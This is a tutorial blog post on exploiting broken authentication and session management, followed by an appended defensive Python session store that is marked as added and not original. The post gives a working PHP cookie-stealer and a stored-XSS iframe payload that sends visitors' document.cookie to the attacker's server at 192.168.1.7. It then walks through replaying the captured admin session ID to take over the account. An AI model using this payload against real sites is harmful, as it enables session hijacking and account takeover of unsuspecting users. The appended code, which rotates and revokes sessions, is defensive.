March 10, 2019

OWASP - Broken access and session management


Welcome to The Cybersploit again. Today we will learn how broken access and session management is exploited in practice. It holds the 2nd position in the OWASP Top 10 vulnerability list of 2017.

What weaknesses lead to broken access and session management?
  • User authentication credentials are not protected when stored.
  • Predictable login credentials.
  • Session IDs are exposed in the URL (e.g., URL rewriting).
  • Session IDs are vulnerable to session fixation attacks.
  • Session value does not timeout or does not get invalidated after logout.
  • Session IDs are not rotated after successful login.
  • Passwords, session IDs, and other credentials are sent over unencrypted connections.
The goal of an attack is to take over one or more accounts and for the attacker to get the same privileges as the attacked user.

In this lesson we will use a persistent (stored) XSS flaw on the website to steal the admin's session cookie and gain admin privileges. Let's start by creating the cookie-stealing script and uploading it to my own web server.

File name: Cookie-stealer.php

<?php
header ("Location: http://192.168.1.7"); //Change it to your webserver address
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

When this script is executed it records the cookie passed in the c parameter, the visitor's IP address, the date and time, and the referrer in the file cookies.html, and then redirects the visitor to 192.168.1.7 (your web server address).

Now upload the file to your web server. In my case I have used my local Apache web server. You can also create one using XAMPP. For more details about how to run an Apache web server on your local machine please check my previous SQL Injection blog.

Now I will open the website, create a blog entry as an anonymous user, enter the following HTML code and post it.

Code:

<html>
<body>
<b> wanteddev</b>
<u>click me</u>
<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="http://192.168.1.7/Cookie-stealer.php?c="+document.cookie)></iframe>
</body>
</html>



Now I will log in as admin and view this blog post from another system. Let's see whether the script captures the user's cookie data.

After that let's move back to the first system and open the cookies.html file to see the captured session ID.



We can see the session ID has been captured successfully. Copy it, then open the website again in a new browser window.


According to the above screenshot we can see the user is not logged in. Now open your cookie manager and replace the current session ID with the one copied from the other system.


Now save the session ID, reload the web page and see the result.


Congratulations friends!! We have successfully gained admin privileges. If you need any help or have any further doubts on this topic please feel free to write your comments below. Thank you and happy hacking!!!
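As an added example (not part of the original post), here is a minimal Python session store that applies the controls from the weakness list above and would also catch the cookie replay demonstrated in this lesson: unpredictable IDs, rotation at login, idle timeout, server-side invalidation on logout, an HttpOnly/Secure cookie so document.cookie cannot hand the ID to injected script, and an alert when an ID is presented from a different client. The IP addresses, the timeout value and the client-fingerprint heuristic are assumptions for illustration.

```python
import secrets
from dataclasses import dataclass

IDLE_TIMEOUT = 15 * 60  # seconds of inactivity before a session dies (assumed policy value)

@dataclass
class Session:
    user: str        # "" until login
    role: str        # "anonymous" or "admin"
    client_ip: str   # client the ID was issued to; compared on every request
    user_agent: str
    last_seen: float

class SessionStore:
    def __init__(self):
        self.sessions = {}  # session id -> Session (constructed in-memory store)
        self.alerts = []    # what monitoring would see
    def create(self, ip, ua, now):
        sid = secrets.token_urlsafe(32)  # unpredictable, never derived from user data
        self.sessions[sid] = Session("", "anonymous", ip, ua, now)
        return sid
    def login(self, sid, user, role, now):
        old = self.sessions.pop(sid)     # discard the pre-auth ID: defeats session fixation
        new_sid = secrets.token_urlsafe(32)
        self.sessions[new_sid] = Session(user, role, old.client_ip, old.user_agent, now)
        return new_sid                   # the rotated ID is what the client gets back
    def resolve(self, sid, ip, ua, now):
        s = self.sessions.get(sid)
        if s is None:
            return None
        if now - s.last_seen > IDLE_TIMEOUT:
            del self.sessions[sid]       # expired: invalidate server-side, not just in the cookie
            return None
        if (ip, ua) != (s.client_ip, s.user_agent):
            # A stolen ID replayed from another machine changes the client fingerprint. This is
            # a coarse heuristic (NAT or proxy changes trip it), so production code would force
            # re-authentication rather than rely on it alone.
            self.alerts.append(f"session of {s.user!r} presented from {ip}, issued to {s.client_ip}; revoked")
            del self.sessions[sid]
            return None
        s.last_seen = now
        return s
    def logout(self, sid):
        self.sessions.pop(sid, None)     # logout must kill the server-side record, not just the cookie

def session_cookie_header(sid):
    # HttpOnly keeps document.cookie from exposing the ID to injected script; Secure keeps it off plain HTTP
    return f"Set-Cookie: session={sid}; Path=/; Secure; HttpOnly; SameSite=Lax"
```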